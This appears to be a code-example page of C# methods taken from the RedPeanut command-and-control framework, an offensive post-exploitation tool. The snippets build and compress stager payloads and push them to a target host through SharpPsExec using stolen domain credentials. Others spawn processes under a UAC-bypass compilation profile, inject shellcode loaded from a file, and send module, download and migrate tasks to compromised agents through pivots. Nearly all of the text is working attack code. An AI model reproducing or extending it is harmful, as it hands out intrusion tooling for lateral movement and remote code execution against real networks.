Example #1
0
        private void Run()
        {
            List <string> args = new List <string>();

            if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
            {
                return;
            }
            else
            {
                //Create stager stream gzip
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                    if (lpipename == null)
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));

                    //Create TaskMsg gzip
                    if (agent != null)
                    {
                        ModuleConfig modconfig = new ModuleConfig
                        {
                            Assembly    = stagerstr,
                            Method      = "Execute",
                            Moduleclass = "RedPeanutRP",
                            Parameters  = new string[] { "pippo" }
                        };

                        TaskMsg task = new TaskMsg
                        {
                            TaskType   = "module",
                            ModuleTask = modconfig,
                            Agentid    = agent.AgentId
                        };

                        if (agent.Pivoter != null)
                        {
                            task.AgentPivot = agent.Pivoter.AgentId;
                        }

                        //Create Service stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                                 .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                                 .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                                 .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);

                        string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));

                        //Create SharpPsExec stream gzip
                        source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                                 .Replace("#DOMAIN#", domain)
                                 .Replace("#USERNAME#", username)
                                 .Replace("#PASSWORD#", password)
                                 .Replace("#HOSTANME#", targethost)
                                 .Replace("#ASSEMBLY#", servicestr)
                                 .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                                 .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                                 .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                                 .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));

                        string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
                    }
                }
            }
        }
Example #2
0
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    if (string.IsNullOrEmpty(pipename))
                    {
                        //Http no pivot stager
                        ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }
                    else
                    {
                        //NamedPipe enable stager
                        ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                        source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                    }

                    string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));

                    ModuleConfig modconfig = new ModuleConfig
                    {
                        Assembly    = stagerstr,
                        Method      = "Execute",
                        Moduleclass = "RedPeanutRP",
                        Parameters  = new string[] { "pippo" }
                    };

                    TaskMsg task = new TaskMsg
                    {
                        TaskType   = "module",
                        ModuleTask = modconfig,
                        Agentid    = agent.AgentId
                    };

                    if (agent.Pivoter != null)
                    {
                        task.AgentPivot = agent.Pivoter.AgentId;
                    }

                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                             .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                             .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#SHELLCODE#", null)
                             .Replace("#USERNAME#", null)
                             .Replace("#PASSWORD#", null)
                             .Replace("#DOMAIN#", null)
                             .Replace("#PROCESS#", process);

                    string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        spawnprocess,
                        "RedPeanutSpawn",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Errore generating task");
            }
        }
        private void Run()
        {
            try
            {
                string host            = ((AgentInstanceHttp)agent).GetAddress();
                int    port            = ((AgentInstanceHttp)agent).GetPort();
                int    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                int    targetframework = ((AgentInstanceHttp)agent).TargetFramework;
                string pipename        = "";

                if (agent.Pivoter != null)
                {
                    host            = agent.Pivoter.SysInfo.Ip;
                    port            = 0;
                    profileid       = RedPeanutC2.server.GetDefaultProfile();
                    targetframework = agent.TargetFramework;
                    pipename        = agent.AgentId;
                }
                else
                {
                    host            = ((AgentInstanceHttp)agent).GetAddress();
                    port            = ((AgentInstanceHttp)agent).GetPort();
                    profileid       = ((AgentInstanceHttp)agent).GetProfileid();
                    targetframework = agent.TargetFramework;
                }

                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
                {
                    string source;

                    string binfilepath = Path.Combine(folderrpath, SHELLCODE_FOLDER, filename);

                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                             .Replace("#NUTCLR#", null)
                             .Replace("#TASK#", null)
                             .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                             .Replace("#SHELLCODE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(binfilepath))))
                             .Replace("#USERNAME#", username)
                             .Replace("#PASSWORD#", password)
                             .Replace("#DOMAIN#", domain)
                             .Replace("#PROCESS#", null);

                    string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                    RunAssemblyBase64(
                        spawnprocess,
                        "RedPeanutSpawn",
                        new string[] { " " },
                        agent);
                }
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Error generating task");
            }
        }
Example #4
0
        public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null)
        {
            switch (tasktype)
            {
            case "download":
                FileDownloadConfig downloadconfig = new FileDownloadConfig
                {
                    Assembly     = assembly,
                    Method       = method,
                    Moduleclass  = type,
                    Parameters   = args.ToArray <string>(),
                    FileNameDest = destfilename
                };

                TaskMsg downloadtask = new TaskMsg
                {
                    TaskType     = "download",
                    DownloadTask = downloadconfig,
                    Agentid      = agent.AgentId
                };

                if (instanceid == null)
                {
                    downloadtask.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    downloadtask.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    downloadtask.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(downloadtask);
                break;

            case "migrate":
                ModuleConfig migrateconfig = new ModuleConfig
                {
                    Assembly    = assembly,
                    Method      = method,
                    Moduleclass = type,
                    Parameters  = args.ToArray <string>()
                };

                TaskMsg migratetask = new TaskMsg
                {
                    TaskType   = "migrate",
                    ModuleTask = migrateconfig,
                    Agentid    = agent.AgentId
                };

                if (instanceid == null)
                {
                    migratetask.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    migratetask.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    migratetask.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(migratetask);
                break;

            default:
                ModuleConfig modconfig = new ModuleConfig
                {
                    Assembly    = assembly,
                    Method      = method,
                    Moduleclass = type,
                    Parameters  = args.ToArray <string>()
                };

                if (agent.Managed)
                {
                    modconfig.Assembly = assembly;
                }
                else
                {
                    modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
                                                                                         assembly, RandomAString(10, new Random()) + ".exe", type, method, args)));
                }

                TaskMsg task = new TaskMsg
                {
                    TaskType   = "module",
                    ModuleTask = modconfig,
                    Agentid    = agent.AgentId
                };

                if (instanceid == null)
                {
                    task.Instanceid = RandomAString(10, new Random());
                }
                else
                {
                    task.Instanceid = instanceid;
                }

                if (agent.Pivoter != null)
                {
                    task.AgentPivot = agent.Pivoter.AgentId;
                }

                agent.SendCommand(task);
                break;
            }
        }